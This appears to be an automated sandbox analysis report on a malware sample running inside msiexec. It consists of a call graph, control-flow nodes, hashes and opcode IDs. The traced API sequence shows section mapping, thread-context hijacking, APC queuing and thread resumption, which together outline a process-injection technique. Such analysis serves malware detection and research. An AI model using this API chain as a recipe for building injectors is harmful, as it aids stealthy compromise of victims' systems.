LdrInitializeThunk LdrInitializeThunk 109843->110361 109844->109797 109848 5eaf60 LdrLoadDll 109847->109848 109849 5ea6cf 109848->109849 109881 5e8bc0 109850->109881 109854 5d9cb6 109854->109804 109855 5d9cac 109855->109854 109888 5eb2b0 109855->109888 109857 5d9cf3 109857->109854 109899 5d9ab0 109857->109899 109859 5d9d13 109905 5d9620 LdrLoadDll 109859->109905 109861 5d9d25 109861->109804 110260 5eb5a0 109862->110260 109865 5eb5a0 LdrLoadDll 109866 5d9c5b 109865->109866 109867 5eb5a0 LdrLoadDll 109866->109867 109868 5d9c71 109867->109868 109869 5df180 109868->109869 109870 5df199 109869->109870 110268 5db040 109870->110268 109872 5df1ac 110272 5ea1e0 109872->110272 109876 5df1d2 109877 5df1fd 109876->109877 110278 5ea260 109876->110278 109879 5ea490 2 API calls 109877->109879 109880 5d9d65 109879->109880 109880->109796 109882 5e8bcf 109881->109882 109906 5e4e50 109882->109906 109884 5d9ca3 109885 5e8a70 109884->109885 109912 5ea600 109885->109912 109889 5eb2c9 109888->109889 109919 5e4a50 109889->109919 109891 5eb2e1 109892 5eb2ea 109891->109892 109958 5eb0f0 109891->109958 109892->109857 109894 5eb2fe 109894->109892 109976 5e9f00 109894->109976 110237 5d7ea0 109899->110237 109901 5d9ad1 109901->109859 109902 5d9aca 109902->109901 110250 5d8160 109902->110250 109905->109861 109907 5e4e6a 109906->109907 109908 5e4e5e 109906->109908 109907->109884 109908->109907 109911 5e52d0 LdrLoadDll 109908->109911 109910 5e4fbc 109910->109884 109911->109910 109915 5eaf60 109912->109915 109914 5e8a85 109914->109855 109916 5eaf70 109915->109916 109918 5eaf92 109915->109918 109917 5e4e50 LdrLoadDll 109916->109917 109917->109918 109918->109914 109920 5e4d85 109919->109920 109930 5e4a64 109919->109930 109920->109891 109923 5e4b73 110044 5ea460 LdrLoadDll 109923->110044 109924 5e4b90 109987 5ea360 109924->109987 109927 5e4b7d 109927->109891 109928 5e4bb7 109929 5ebdc0 2 API calls 109928->109929 109931 5e4bc3 109929->109931 109930->109920 109984 5e9c50 109930->109984 109931->109927 109932 5e4d49 109931->109932 109933 5e4d5f 109931->109933 109938 5e4c52 109931->109938 109934 5ea490 2 API calls 109932->109934 110053 5e4790 LdrLoadDll NtReadFile NtClose 109933->110053 109935 5e4d50 109934->109935 109935->109891 109937 5e4d72 109937->109891 109939 5e4cb9 109938->109939 109941 5e4c61 109938->109941 109939->109932 109940 5e4ccc 109939->109940 110046 5ea2e0 109940->110046 109943 5e4c7a 109941->109943 109944 5e4c66 109941->109944 109945 5e4c7f 109943->109945 109946 5e4c97 109943->109946 110045 5e4650 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 109944->110045 109990 5e46f0 109945->109990 109946->109935 110002 5e4410 109946->110002 109949 5e4c70 109949->109891 109952 5e4c8d 109952->109891 109954 5e4d2c 110050 5ea490 109954->110050 109956 5e4caf 109956->109891 109957 5e4d38 109957->109891 109959 5eb101 109958->109959 109960 5eb113 109959->109960 110073 5ebd40 109959->110073 109960->109894 109962 5eb134 110076 5e4070 109962->110076 109964 5eb180 109964->109894 109965 5eb157 109965->109964 109966 5e4070 3 API calls 109965->109966 109969 5eb179 109966->109969 109968 5eb20a 109970 5eb21a 109968->109970 110202 5eaf00 LdrLoadDll 109968->110202 109969->109964 110108 5e5390 109969->110108 110118 5ead70 109970->110118 109973 5eb248 110197 5e9ec0 109973->110197 109977 5eaf60 LdrLoadDll 109976->109977 109978 5e9f1c 109977->109978 110231 4732c0a 109978->110231 109979 5e9f37 109981 5ebdc0 109979->109981 110234 5ea670 109981->110234 109983 5eb359 109983->109857 109985 5eaf60 LdrLoadDll 109984->109985 109986 5e4b44 109985->109986 109986->109923 109986->109924 109986->109927 109988 5ea37c NtCreateFile 109987->109988 109989 5eaf60 LdrLoadDll 109987->109989 109988->109928 109989->109988 109991 5e470c 109990->109991 109992 5ea2e0 LdrLoadDll 109991->109992 109993 5e472d 109992->109993 109994 5e4748 109993->109994 109995 5e4734 109993->109995 109997 5ea490 2 API calls 109994->109997 109996 5ea490 2 API calls 109995->109996 109999 5e473d 109996->109999 109998 5e4751 109997->109998 110054 5ebfd0 LdrLoadDll RtlAllocateHeap 109998->110054 109999->109952 110001 5e475c 110001->109952 110003 5e448e 110002->110003 110004 5e445b 110002->110004 110005 5e45d9 110003->110005 110009 5e44aa 110003->110009 110006 5ea2e0 LdrLoadDll 110004->110006 110007 5ea2e0 LdrLoadDll 110005->110007 110008 5e4476 110006->110008 110014 5e45f4 110007->110014 110010 5ea490 2 API calls 110008->110010 110011 5ea2e0 LdrLoadDll 110009->110011 110012 5e447f 110010->110012 110013 5e44c5 110011->110013 110012->109956 110016 5e44cc 110013->110016 110017 5e44e1 110013->110017 110068 5ea320 LdrLoadDll 110014->110068 110019 5ea490 2 API calls 110016->110019 110020 5e44fc 110017->110020 110021 5e44e6 110017->110021 110018 5e462e 110022 5ea490 2 API calls 110018->110022 110023 5e44d5 110019->110023 110030 5e4501 110020->110030 110055 5ebf90 110020->110055 110024 5ea490 2 API calls 110021->110024 110025 5e4639 110022->110025 110023->109956 110026 5e44ef 110024->110026 110025->109956 110026->109956 110027 5e4513 110027->109956 110030->110027 110058 5ea410 110030->110058 110031 5e4567 110036 5e457e 110031->110036 110067 5ea2a0 LdrLoadDll 110031->110067 110033 5e459a 110035 5ea490 2 API calls 110033->110035 110034 5e4585 110037 5ea490 2 API calls 110034->110037 110038 5e45a3 110035->110038 110036->110033 110036->110034 110037->110027 110039 5e45cf 110038->110039 110062 5ebb90 110038->110062 110039->109956 110041 5e45ba 110042 5ebdc0 2 API calls 110041->110042 110043 5e45c3 110042->110043 110043->109956 110044->109927 110045->109949 110047 5eaf60 LdrLoadDll 110046->110047 110048 5e4d14 110046->110048 110047->110048 110049 5ea320 LdrLoadDll 110048->110049 110049->109954 110051 5eaf60 LdrLoadDll 110050->110051 110052 5ea4ac NtClose 110051->110052 110052->109957 110053->109937 110054->110001 110069 5ea630 110055->110069 110057 5ebfa8 110057->110030 110059 5eaf60 LdrLoadDll 110058->110059 110060 5ea42c NtReadFile 110059->110060 110060->110031 110063 5ebb9d 110062->110063 110064 5ebbb4 110062->110064 110063->110064 110065 5ebf90 2 API calls 110063->110065 110064->110041 110066 5ebbcb 110065->110066 110066->110041 110067->110036 110068->110018 110070 5ea645 110069->110070 110071 5eaf60 LdrLoadDll 110070->110071 110072 5ea64c RtlAllocateHeap 110071->110072 110072->110057 110203 5ea540 110073->110203 110077 5e4081 110076->110077 110078 5e4089 110076->110078 110077->109965 110079 5e435c 110078->110079 110207 5ecf30 110078->110207 110079->109965 110081 5e40dd 110082 5ecf30 2 API calls 110081->110082 110085 5e40e8 110082->110085 110083 5e4136 110086 5ecf30 2 API calls 110083->110086 110085->110083 110212 5ecfd0 LdrLoadDll RtlAllocateHeap RtlFreeHeap 110085->110212 110213 5ed060 110085->110213 110089 5e414a 110086->110089 110088 5e41a7 110090 5ecf30 2 API calls 110088->110090 110089->110088 110091 5ed060 3 API calls 110089->110091 110092 5e41bd 110090->110092 110091->110089 110093 5e41fa 110092->110093 110096 5ed060 3 API calls 110092->110096 110094 5ecf30 2 API calls 110093->110094 110095 5e4205 110094->110095 110097 5ed060 3 API calls 110095->110097 110103 5e423f 110095->110103 110096->110092 110097->110095 110099 5e4334 110220 5ecf90 LdrLoadDll RtlFreeHeap 110099->110220 110101 5e433e 110221 5ecf90 LdrLoadDll RtlFreeHeap 110101->110221 110219 5ecf90 LdrLoadDll RtlFreeHeap 110103->110219 110104 5e4348 110222 5ecf90 LdrLoadDll RtlFreeHeap 110104->110222 110106 5e4352 110223 5ecf90 LdrLoadDll RtlFreeHeap 110106->110223 110109 5e53a1 110108->110109 110110 5e4a50 8 API calls 110109->110110 110112 5e53b7 110110->110112 110111 5e540a 110111->109968 110112->110111 110113 5e5405 110112->110113 110114 5e53f2 110112->110114 110116 5ebdc0 2 API calls 110113->110116 110115 5ebdc0 2 API calls 110114->110115 110117 5e53f7 110115->110117 110116->110111 110117->109968 110224 5eac30 110118->110224 110121 5eac30 LdrLoadDll 110122 5ead8d 110121->110122 110123 5eac30 LdrLoadDll 110122->110123 110124 5ead96 110123->110124 110125 5eac30 LdrLoadDll 110124->110125 110126 5ead9f 110125->110126 110127 5eac30 LdrLoadDll 110126->110127 110128 5eada8 110127->110128 110129 5eac30 LdrLoadDll 110128->110129 110130 5eadb1 110129->110130 110131 5eac30 LdrLoadDll 110130->110131 110132 5eadbd 110131->110132 110133 5eac30 LdrLoadDll 110132->110133 110134 5eadc6 110133->110134 110135 5eac30 LdrLoadDll 110134->110135 110136 5eadcf 110135->110136 110137 5eac30 LdrLoadDll 110136->110137 110138 5eadd8 110137->110138 110139 5eac30 LdrLoadDll 110138->110139 110140 5eade1 110139->110140 110141 5eac30 LdrLoadDll 110140->110141 110142 5eadea 110141->110142 110143 5eac30 LdrLoadDll 110142->110143 110144 5eadf6 110143->110144 110145 5eac30 LdrLoadDll 110144->110145 110146 5eadff 110145->110146 110147 5eac30 LdrLoadDll 110146->110147 110148 5eae08 110147->110148 110149 5eac30 LdrLoadDll 110148->110149 110150 5eae11 110149->110150 110151 5eac30 LdrLoadDll 110150->110151 110152 5eae1a 110151->110152 110153 5eac30 LdrLoadDll 110152->110153 110154 5eae23 110153->110154 110155 5eac30 LdrLoadDll 110154->110155 110156 5eae2f 110155->110156 110157 5eac30 LdrLoadDll 110156->110157 110158 5eae38 110157->110158 110159 5eac30 LdrLoadDll 110158->110159 110160 5eae41 110159->110160 110161 5eac30 LdrLoadDll 110160->110161 110162 5eae4a 110161->110162 110163 5eac30 LdrLoadDll 110162->110163 110164 5eae53 110163->110164 110165 5eac30 LdrLoadDll 110164->110165 110166 5eae5c 110165->110166 110167 5eac30 LdrLoadDll 110166->110167 110168 5eae68 110167->110168 110169 5eac30 LdrLoadDll 110168->110169 110170 5eae71 110169->110170 110171 5eac30 LdrLoadDll 110170->110171 110172 5eae7a 110171->110172 110173 5eac30 LdrLoadDll 110172->110173 110174 5eae83 110173->110174 110175 5eac30 LdrLoadDll 110174->110175 110176 5eae8c 110175->110176 110177 5eac30 LdrLoadDll 110176->110177 110178 5eae95 110177->110178 110179 5eac30 LdrLoadDll 110178->110179 110180 5eaea1 110179->110180 110181 5eac30 LdrLoadDll 110180->110181 110182 5eaeaa 110181->110182 110183 5eac30 LdrLoadDll 110182->110183 110184 5eaeb3 110183->110184 110185 5eac30 LdrLoadDll 110184->110185 110186 5eaebc 110185->110186 110187 5eac30 LdrLoadDll 110186->110187 110188 5eaec5 110187->110188 110189 5eac30 LdrLoadDll 110188->110189 110190 5eaece 110189->110190 110191 5eac30 LdrLoadDll 110190->110191 110192 5eaeda 110191->110192 110193 5eac30 LdrLoadDll 110192->110193 110194 5eaee3 110193->110194 110195 5eac30 LdrLoadDll 110194->110195 110196 5eaeec 110195->110196 110196->109973 110198 5eaf60 LdrLoadDll 110197->110198 110199 5e9edc 110198->110199 110230 4732df0 LdrInitializeThunk 110199->110230 110200 5e9ef3 110200->109894 110202->109970 110204 5ea543 110203->110204 110205 5eaf60 LdrLoadDll 110204->110205 110206 5ea55c 110205->110206 110206->109962 110208 5ecf46 110207->110208 110209 5ecf40 110207->110209 110210 5ebf90 2 API calls 110208->110210 110209->110081 110211 5ecf6c 110210->110211 110211->110081 110212->110085 110214 5ecfd0 110213->110214 110215 5ed02d 110214->110215 110216 5ebf90 2 API calls 110214->110216 110215->110085 110217 5ed00a 110216->110217 110218 5ebdc0 2 API calls 110217->110218 110218->110215 110219->110099 110220->110101 110221->110104 110222->110106 110223->110079 110225 5eac4b 110224->110225 110226 5e4e50 LdrLoadDll 110225->110226 110227 5eac6b 110226->110227 110228 5e4e50 LdrLoadDll 110227->110228 110229 5ead17 110227->110229 110228->110229 110229->110121 110230->110200 110232 4732c1f LdrInitializeThunk 110231->110232 110233 4732c11 110231->110233 110232->109979 110233->109979 110235 5eaf60 LdrLoadDll 110234->110235 110236 5ea68c RtlFreeHeap 110235->110236 110236->109983 110238 5d7eab 110237->110238 110239 5d7eb0 110237->110239 110238->109902 110240 5ebd40 LdrLoadDll 110239->110240 110247 5d7ed5 110240->110247 110241 5d7f38 110241->109902 110242 5e9ec0 2 API calls 110242->110247 110243 5d7f3e 110244 5d7f64 110243->110244 110246 5ea5c0 2 API calls 110243->110246 110244->109902 110248 5d7f55 110246->110248 110247->110241 110247->110242 110247->110243 110249 5ebd40 LdrLoadDll 110247->110249 110254 5ea5c0 110247->110254 110248->109902 110249->110247 110251 5d8168 110250->110251 110252 5ea5c0 2 API calls 110251->110252 110253 5d817e 110252->110253 110253->109859 110255 5eaf60 LdrLoadDll 110254->110255 110256 5ea5dc 110255->110256 110259 4732c70 LdrInitializeThunk 110256->110259 110257 5ea5f3 110257->110247 110259->110257 110261 5eb5c3 110260->110261 110264 5dacf0 110261->110264 110265 5dad14 110264->110265 110266 5d9c4a 110265->110266 110267 5dad50 LdrLoadDll 110265->110267 110266->109865 110267->110266 110269 5db063 110268->110269 110271 5db0e0 110269->110271 110283 5e9c90 LdrLoadDll 110269->110283 110271->109872 110273 5eaf60 LdrLoadDll 110272->110273 110274 5df1bb 110273->110274 110274->109880 110275 5ea7d0 110274->110275 110276 5eaf60 LdrLoadDll 110275->110276 110277 5ea7ef LookupPrivilegeValueW 110276->110277 110277->109876 110279 5ea27c 110278->110279 110280 5eaf60 LdrLoadDll 110278->110280 110284 4732ea0 LdrInitializeThunk 110279->110284 110280->110279 110281 5ea29b 110281->109877 110283->110271 110284->110281 110286 5db1f0 110285->110286 110287 5db040 LdrLoadDll 110286->110287 110288 5db204 110287->110288 110288->109812 110290 5daf34 110289->110290 110362 5e9c90 LdrLoadDll 110290->110362 110292 5daf6e 110292->109814 110294 5df3ac 110293->110294 110295 5db1c0 LdrLoadDll 110294->110295 110296 5df3be 110295->110296 110363 5df290 110296->110363 110299 5df3d9 110302 5df3e4 110299->110302 110303 5ea490 2 API calls 110299->110303 110300 5df3f1 110301 5df402 110300->110301 110304 5ea490 2 API calls 110300->110304 110301->109817 110302->109817 110303->110302 110304->110301 110306 5df43c 110305->110306 110383 5db2b0 110306->110383 110308 5df44e 110309 5df290 3 API calls 110308->110309 110310 5df45f 110309->110310 110311 5df469 110310->110311 110312 5df481 110310->110312 110313 5df474 110311->110313 110315 5ea490 2 API calls 110311->110315 110314 5df492 110312->110314 110316 5ea490 2 API calls 110312->110316 110313->109819 110314->109819 110315->110313 110316->110314 110318 5dcaa6 110317->110318 110319 5dcab0 110317->110319 110318->109828 110320 5daf10 LdrLoadDll 110319->110320 110321 5dcb4e 110320->110321 110322 5dcb74 110321->110322 110323 5db040 LdrLoadDll 110321->110323 110322->109828 110324 5dcb90 110323->110324 110325 5e4a50 8 API calls 110324->110325 110326 5dcbe5 110325->110326 110326->109828 110328 5dd646 110327->110328 110329 5db040 LdrLoadDll 110328->110329 110330 5dd65a 110329->110330 110387 5dd310 110330->110387 110332 5d908b 110333 5dcc00 110332->110333 110334 5dcc26 110333->110334 110335 5db040 LdrLoadDll 110334->110335 110336 5dcca9 110334->110336 110335->110336 110337 5db040 LdrLoadDll 110336->110337 110338 5dcd16 110337->110338 110339 5daf10 LdrLoadDll 110338->110339 110340 5dcd7f 110339->110340 110341 5db040 LdrLoadDll 110340->110341 110342 5dce2f 110341->110342 110342->109840 110346 5d8d14 110343->110346 110416 5df6d0 110343->110416 110345 5d8f25 110345->109797 110346->110345 110421 5e43a0 110346->110421 110348 5d8d70 110348->110345 110424 5d8ab0 110348->110424 110351 5ecf30 2 API calls 110352 5d8db2 110351->110352 110353 5ed060 3 API calls 110352->110353 110357 5d8dc7 110353->110357 110354 5d7ea0 3 API calls 110354->110357 110357->110345 110357->110354 110358 5dc7b0 17 API calls 110357->110358 110359 5d8160 2 API calls 110357->110359 110429 5df670 110357->110429 110433 5df080 19 API calls 110357->110433 110358->110357 110359->110357 110360->109821 110361->109838 110362->110292 110364 5df2aa 110363->110364 110372 5df360 110363->110372 110365 5db040 LdrLoadDll 110364->110365 110366 5df2cc 110365->110366 110373 5e9f40 110366->110373 110368 5df30e 110377 5e9f80 110368->110377 110371 5ea490 2 API calls 110371->110372 110372->110299 110372->110300 110374 5e9f56 110373->110374 110375 5eaf60 LdrLoadDll 110374->110375 110376 5e9f5c 110375->110376 110376->110368 110378 5eaf60 LdrLoadDll 110377->110378 110379 5e9f9c 110378->110379 110382 47335c0 LdrInitializeThunk 110379->110382 110380 5df354 110380->110371 110382->110380 110384 5db2d7 110383->110384 110385 5db040 LdrLoadDll 110384->110385 110386 5db313 110385->110386 110386->110308 110388 5dd327 110387->110388 110396 5df710 110388->110396 110392 5dd39b 110393 5dd3a2 110392->110393 110407 5ea2a0 LdrLoadDll 110392->110407 110393->110332 110395 5dd3b5 110395->110332 110397 5df735 110396->110397 110408 5d81a0 110397->110408 110399 5dd36f 110404 5ea6e0 110399->110404 110400 5e4a50 8 API calls 110402 5df759 110400->110402 110402->110399 110402->110400 110403 5ebdc0 2 API calls 110402->110403 110415 5df550 LdrLoadDll CreateProcessInternalW LdrInitializeThunk 110402->110415 110403->110402 110405 5eaf60 LdrLoadDll 110404->110405 110406 5ea6ff CreateProcessInternalW 110405->110406 110406->110392 110407->110395 110409 5d829f 110408->110409 110410 5d81b5 110408->110410 110409->110402 110410->110409 110411 5e4a50 8 API calls 110410->110411 110412 5d8222 110411->110412 110413 5ebdc0 2 API calls 110412->110413 110414 5d8249 110412->110414 110413->110414 110414->110402 110415->110402 110417 5e4e50 LdrLoadDll 110416->110417 110418 5df6ef 110417->110418 110419 5df6fd 110418->110419 110420 5df6f6 SetErrorMode 110418->110420 110419->110346 110420->110419 110423 5e43c6 110421->110423 110434 5df4a0 110421->110434 110423->110348 110425 5ebd40 LdrLoadDll 110424->110425 110428 5d8ad5 110425->110428 110426 5d8cea 110426->110351 110428->110426 110454 5e9880 110428->110454 110430 5df683 110429->110430 110502 5e9e90 110430->110502 110433->110357 110435 5df4bd 110434->110435 110441 5e9fc0 110435->110441 110438 5df505 110438->110423 110442 5eaf60 LdrLoadDll 110441->110442 110443 5e9fdc 110442->110443 110452 4732f30 LdrInitializeThunk 110443->110452 110444 5df4fe 110444->110438 110446 5ea010 110444->110446 110447 5ea026 110446->110447 110448 5eaf60 LdrLoadDll 110447->110448 110449 5ea02c 110448->110449 110453 4732d10 LdrInitializeThunk 110449->110453 110450 5df52e 110450->110423 110452->110444 110453->110450 110455 5ebf90 2 API calls 110454->110455 110456 5e9897 110455->110456 110475 5d9310 110456->110475 110458 5e98b2 110459 5e98d9 110458->110459 110460 5e98f0 110458->110460 110461 5ebdc0 2 API calls 110459->110461 110462 5ebd40 LdrLoadDll 110460->110462 110463 5e98e6 110461->110463 110464 5e992a 110462->110464 110463->110426 110465 5ebd40 LdrLoadDll 110464->110465 110466 5e9943 110465->110466 110471 5e9be4 110466->110471 110481 5ebd80 LdrLoadDll 110466->110481 110468 5e9bc9 110469 5e9bd0 110468->110469 110468->110471 110470 5ebdc0 2 API calls 110469->110470 110472 5e9bda 110470->110472 110473 5ebdc0 2 API calls 110471->110473 110472->110426 110474 5e9c39 110473->110474 110474->110426 110476 5d9335 110475->110476 110477 5dacf0 LdrLoadDll 110476->110477 110478 5d9368 110477->110478 110479 5d938d 110478->110479 110482 5dcf20 110478->110482 110479->110458 110481->110468 110483 5dcf4c 110482->110483 110484 5ea1e0 LdrLoadDll 110483->110484 110485 5dcf65 110484->110485 110486 5dcf6c 110485->110486 110493 5ea220 110485->110493 110486->110479 110490 5dcfa7 110491 5ea490 2 API calls 110490->110491 110492 5dcfca 110491->110492 110492->110479 110494 5ea23c 110493->110494 110495 5eaf60 LdrLoadDll 110493->110495 110501 4732ca0 LdrInitializeThunk 110494->110501 110495->110494 110496 5dcf8f 110496->110486 110498 5ea810 110496->110498 110499 5eaf60 LdrLoadDll 110498->110499 110500 5ea82f 110499->110500 110500->110490 110501->110496 110503 5eaf60 LdrLoadDll 110502->110503 110504 5e9eac 110503->110504 110507 4732dd0 LdrInitializeThunk 110504->110507 110505 5df6ae 110505->110357 110507->110505 110509 4732ad0 LdrInitializeThunk 110510 460cb84 110513 460a042 110510->110513 110512 460cba5 110514 460a06b 110513->110514 110515 460a182 NtQueryInformationProcess 110514->110515 110530 460a56c 110514->110530 110517 460a1ba 110515->110517 110516 460a1ef 110516->110512 110517->110516 110518 460a290 110517->110518 110519 460a2db 110517->110519 110542 4609de2 NtCreateSection NtMapViewOfSection NtClose 110518->110542 110520 460a2fc NtSuspendThread 110519->110520 110522 460a30d 110520->110522 110524 460a331 110520->110524 110522->110512 110523 460a2cf 110523->110512 110527 460a412 110524->110527 110533 4609bb2 110524->110533 110526 460a531 110529 460a552 NtResumeThread 110526->110529 110527->110526 110528 460a4a6 NtSetContextThread 110527->110528 110532 460a4bd 110528->110532 110529->110530 110530->110512 110531 460a51c RtlQueueApcWow64Thread 110531->110526 110532->110526 110532->110531 110534 4609bf7 110533->110534 110535 4609c66 NtCreateSection 110534->110535 110536 4609ca0 110535->110536 110537 4609d4e 110535->110537 110538 4609cc1 NtMapViewOfSection 110536->110538 110537->110527 110538->110537 110539 4609d0c 110538->110539 110539->110537 110540 4609d88 110539->110540 110541 4609dc5 NtClose 110540->110541 110541->110527 110542->110523 110543 5e9080 110544 5ebd40 LdrLoadDll 110543->110544 110546 5e90bb 110544->110546 110545 5e919c 110546->110545 110547 5dacf0 LdrLoadDll 110546->110547 110548 5e90f1 110547->110548 110549 5e4e50 LdrLoadDll 110548->110549 110551 5e910d 110549->110551 110550 5e9120 Sleep 110550->110551 110551->110545 110551->110550 110554 5e8ca0 LdrLoadDll 110551->110554 110555 5e8eb0 LdrLoadDll 110551->110555 110554->110551 110555->110551

                                            Executed Functions

                                            Function 0460A036 Relevance: 11.0, APIs: 5, Strings: 1, Instructions: 481nativeCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            APIs
                                            • NtQueryInformationProcess.NTDLL ref: 0460A19F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.4571836853.0000000004600000.00000040.00000800.00020000.00000000.sdmp, Offset: 04600000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_4600000_msiexec.jbxd
                                            Similarity
                                            • API ID: InformationProcessQuery
                                            • String ID: 0
                                            • API String ID: 1778838933-4108050209
                                            • Opcode ID: 7bc916a415ef614ffafa7f75d0ec115445e44d1b24a8fe03bb76e065ae57333e
                                            • Instruction ID: cff2564c011a955e896f223d5ea134cadd00ef5a907876125a003caeaa37587e
                                            • Opcode Fuzzy Hash: 7bc916a415ef614ffafa7f75d0ec115445e44d1b24a8fe03bb76e065ae57333e
                                            • Instruction Fuzzy Hash: 90F11270518A4C8FDB69EF68C894AEEB7E0FF98304F40862ED44AD7291EF34A545CB45
                                            Function 04609BAF Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 227nativeCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 209 4609baf-4609bfe call 4609102 212 4609c00 209->212 213 4609c0c-4609c9a call 460b942 * 2 NtCreateSection 209->213 214 4609c02-4609c0a 212->214 219 4609ca0-4609d0a call 460b942 NtMapViewOfSection 213->219 220 4609d5a-4609d68 213->220 214->213 214->214 223 4609d52 219->223 224 4609d0c-4609d4c 219->224 223->220 226 4609d69-4609d6b 224->226 227 4609d4e-4609d4f 224->227 228 4609d88-4609ddc call 460cd62 NtClose 226->228 229 4609d6d-4609d72 226->229 227->223 230 4609d74-4609d86 call 4609172 229->230 230->228
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.4571836853.0000000004600000.00000040.00000800.00020000.00000000.sdmp, Offset: 04600000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_4600000_msiexec.jbxd
                                            Similarity
                                            • API ID: Section$CloseCreateView
                                            • String ID: @$@
                                            • API String ID: 1133238012-149943524
                                            • Opcode ID: db7dcd85dc853400a789dde9de35cb8114d6383d98fd4a16120e7ccab82aa783
                                            • Instruction ID: 02c263bad67412d747ba831bf2056b5b13af838346ea23cc9f2b986fd6b7a083
                                            • Opcode Fuzzy Hash: db7dcd85dc853400a789dde9de35cb8114d6383d98fd4a16120e7ccab82aa783
                                            • Instruction Fuzzy Hash: BD619370618B088FCB5CDF58D8856AABBE1FF98314F50462EE58AC3291DF35E445CB86
                                            Function 04609BB2 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 171nativeCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 268 4609bb2-4609bef 269 4609bf7-4609bfe 268->269 270 4609bf2 call 4609102 268->270 271 4609c00 269->271 272 4609c0c-4609c9a call 460b942 * 2 NtCreateSection 269->272 270->269 273 4609c02-4609c0a 271->273 278 4609ca0-4609d0a call 460b942 NtMapViewOfSection 272->278 279 4609d5a-4609d68 272->279 273->272 273->273 282 4609d52 278->282 283 4609d0c-4609d4c 278->283 282->279 285 4609d69-4609d6b 283->285 286 4609d4e-4609d4f 283->286 287 4609d88-4609ddc call 460cd62 NtClose 285->287 288 4609d6d-4609d72 285->288 286->282 289 4609d74-4609d86 call 4609172 288->289 289->287
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.4571836853.0000000004600000.00000040.00000800.00020000.00000000.sdmp, Offset: 04600000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_4600000_msiexec.jbxd
                                            Similarity
                                            • API ID: Section$CreateView
                                            • String ID: @$@
                                            • API String ID: 1585966358-149943524
                                            • Opcode ID: d19581801156352ea8c1368f03ac477e7143ca4b49b2be0ea58d8e64d299f740
                                            • Instruction ID: 36592fb09d6af4cf7415f724f55be337ded6d1b980b47e9fe091b8e13aa33c07
                                            • Opcode Fuzzy Hash: d19581801156352ea8c1368f03ac477e7143ca4b49b2be0ea58d8e64d299f740
                                            • Instruction Fuzzy Hash: FC5191B0518B088FD75CDF18D8856AABBE0FB88304F50462EF58AC3291DF31E441CB86
                                            Function 0460A042 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 163nativeCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            APIs
                                            • NtQueryInformationProcess.NTDLL ref: 0460A19F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.4571836853.0000000004600000.00000040.00000800.00020000.00000000.sdmp, Offset: 04600000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_4600000_msiexec.jbxd
                                            Similarity
                                            • API ID: InformationProcessQuery
                                            • String ID: 0
                                            • API String ID: 1778838933-4108050209
                                            • Opcode ID: 4a13b2017a61ababd9bba988d9a9b5b8b8f576b3da72e298de5122239bed11ad
                                            • Instruction ID: 67f333d72f2ce887d90cd0179b3efe15f4dc22b810c96d8d0315c9346309dc6c
                                            • Opcode Fuzzy Hash: 4a13b2017a61ababd9bba988d9a9b5b8b8f576b3da72e298de5122239bed11ad
                                            • Instruction Fuzzy Hash: 76512E70914A8C8FDB69EF68C8946EEB7F4FB98305F40862ED44AD7250EF309645CB45
                                            Function 04732C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.4571896686.00000000046C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046C0000, based on PE: true
                                            • Associated: 00000007.00000002.4571896686.00000000047E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000007.00000002.4571896686.00000000047ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000007.00000002.4571896686.000000000485E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_46c0000_msiexec.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 2f5c5669144d62c853d46a3eedb766b69cc5fcbfc6791f1c4c69e55a2801284a
                                            • Instruction ID: 574d1c55701e4f7756c641e776b6c25236fc88073de3d89e51690fc5e70c7340
                                            • Opcode Fuzzy Hash: 2f5c5669144d62c853d46a3eedb766b69cc5fcbfc6791f1c4c69e55a2801284a
                                            • Instruction Fuzzy Hash: 1B90023530148C02F1207158840475A00058BD0305F5AC421A442567CD87D5D9917122
                                            Function 04732C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.4571896686.00000000046C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046C0000, based on PE: true
                                            • Associated: 00000007.00000002.4571896686.00000000047E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000007.00000002.4571896686.00000000047ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000007.00000002.4571896686.000000000485E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_46c0000_msiexec.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 8f6ea6a8a2554fb007b883771a1f806a68aef3fd6296c34c4759e4a38832eab9
                                            • Instruction ID: d6ae8f2a95757cd065830f8d29d0ca66ba151d3719c8a84bec3532ec6e6edfd3
